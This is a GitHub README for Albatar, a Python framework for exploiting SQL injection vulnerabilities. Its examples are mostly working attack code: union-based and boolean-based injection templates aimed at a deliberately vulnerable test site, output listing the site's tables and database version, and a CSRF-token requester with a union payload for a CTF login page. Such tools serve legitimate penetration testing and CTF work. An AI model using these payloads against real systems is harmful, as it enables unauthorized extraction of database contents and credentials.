Albatar is a SQLi exploitation framework in Python
Switch branches/tags
Nothing to show
Clone or download
Latest commit 142f892 Oct 3, 2016
Permalink
Failed to load latest commit information.
README.md Moar documentation Apr 26, 2016
albatar.py Always confirm char Oct 4, 2016
demo.py Always confirm char Oct 4, 2016

README.md

I wrote Albatar to have a neat and tidy tool to exploit SQL Injection vulnerabilities.

Unlike sqlmap, Albatar will not detect SQL Injection vulnerabilities, it was primarily designed to help me exploit not-so-straightforward SQLIs where sqlmap would need tweaking and patching to work.

Albatar is a framework in Python. As a result, you need to write some Python code to be able to exploit the SQLI. Then simply invoke your script by passing sqlmap-like command line options (like --dbs, --banner etc.) to retrieve data from the database.

Currently, Albatar supports MySQL, MSSQL and Oracle with the Union, Error, Boolean and Time techniques.

Examples

  • Simple union-based SQLI (MySQL)

Let's use Albatar to exploit a dead-simple union-based SQLI at http://testphp.vulnweb.com/artists.php?artist=1. Clone the repository, and create the below script:

from albatar import *
from urllib import quote
import re

PROXIES = {} #'http': 'http://127.0.0.1:8082', 'https': 'http://127.0.0.1:8082'}
HEADERS = ['User-Agent: Mozilla/5.0']

def extract_results(headers, body, time):
  return re.findall(':ABC:(.+?):ABC:', body, re.S)

def mysql_union():

  def make_requester():
    return Requester_HTTP(
      proxies = PROXIES,
      headers = HEADERS,
      url = 'http://testphp.vulnweb.com/artists.php?artist=${injection}',
      method = 'GET',
      response_processor = extract_results,
      encode_payload = quote,
      )

  template = '-1 union all select null,null,concat(0x3a4142433a,X,0x3a4142433a) from ${query}-- '

  return Method_union(make_requester, template)

sqli = MySQL_Inband(mysql_union())

for r in sqli.exploit():
  print r

Then execute the script to exploit the SQLI:

$ python testphp-union.py -D acuart --tables
17:39:59 albatar - Starting Albatar v0.0 (https://github.com/lanjelot/albatar) at 2016-04-21 17:39 AEST
17:39:59 albatar - Executing: ('(SELECT COUNT(*) X FROM information_schema.tables WHERE table_schema="acuart")a', '(SELECT table_name X FROM information_schema.tables WHERE table_schema="acuart" LIMIT ${row_pos},${row_count})a')
17:39:59 albatar - count: 8
artists
carts
categ
featured
guestbook
pictures
products
users
17:40:05 albatar - Time: 0h 0m 5s
  • Simple boolean-based SQLI (MySQL)

Here's how to exploit a boolean-based SQLI at http://testphp.vulnweb.com/listproducts.php?cat=1.

from albatar import *
from urllib import quote
import re

PROXIES = {} #'http': 'http://127.0.0.1:8082', 'https': 'http://127.0.0.1:8082'}
HEADERS = ['User-Agent: Mozilla/5.0']

def test_state_grep(headers, body, time):
  if 'Lorem ipsum dolor sit amet' in body:
    return 1
  else:
    return 0

def mysql_boolean():

  def make_requester():
    return Requester_HTTP(
      proxies = PROXIES,
      headers = HEADERS,
      url = 'http://testphp.vulnweb.com/listproducts.php?cat=${injection}',
      method = 'GET',
      response_processor = test_state_grep,
      encode_payload = quote
      )

  template = '1 and (ascii(substring((${query}),${char_pos},1))&${bit_mask})=${bit_mask}'

  return Method_bitwise(make_requester, template, confirm_char=True)

sqli = MySQL_Blind(mysql_boolean())

for r in sqli.exploit():
  print r

And execute:

$ python testphp.py -b
14:19:22 albatar - Starting Albatar v0.0 (https://github.com/lanjelot/albatar) at 2016-04-21 14:19 AEST
14:19:22 albatar - Executing: 'SELECT VERSION()'
5.1.73-0ubuntu0.10.04.1
14:19:41 albatar - Time: 0h 0m 19s
  • Encoding / WAF evasion

If you need to encode your payload to meet specific requirements, simply code a function to mangle the payload in every request. The web task luhn-300 from Hackim CTF 2016 was a good example to showcase this.

  • CSRF tokens

If you need to do anything before or after submitting the SQLI payload, simply extend the Requester class. For example, if you need to provide a CSRF token, like with the web task hackme-400 from SU CTF 2016, write something like this:

...
class Requester_CSRF(Requester_HTTP_requests):

  def test(self, payload):
    response = self.session.get('http://ctf.sharif.edu:35455/chal/hackme/8b784460681e5282/login.php')
    token = re.search("name='user_token' value='([^']+)'", response.text).group(1)
    self.http_opts[2] = self.http_opts[2].replace('_CSRF_', token)

    return super(Requester_CSRF, self).test(payload)

def mysql_union():

  def make_requester():
    return Requester_CSRF(
      proxies = PROXIES,
      headers = HEADERS,
      url = 'http://ctf.sharif.edu:35455/chal/hackme/8b784460681e5282/login.php',
      body = 'username=${injection}&password=asdf&Login=Login&user_token=_CSRF_',
      method = 'POST',
      response_processor = extract_results,
      encode_payload = quote,
      )

  template = "a' union select concat(0x3a4142433a,X,0x3a4142433a),null,null,null from ${query} #"

  return Method_union(make_requester, template, pager=10)

You could even write a brand new Requester class to exploit a SQLI that is not in a web application, but in a command line application for example.

  • More

Find more examples in demo.py.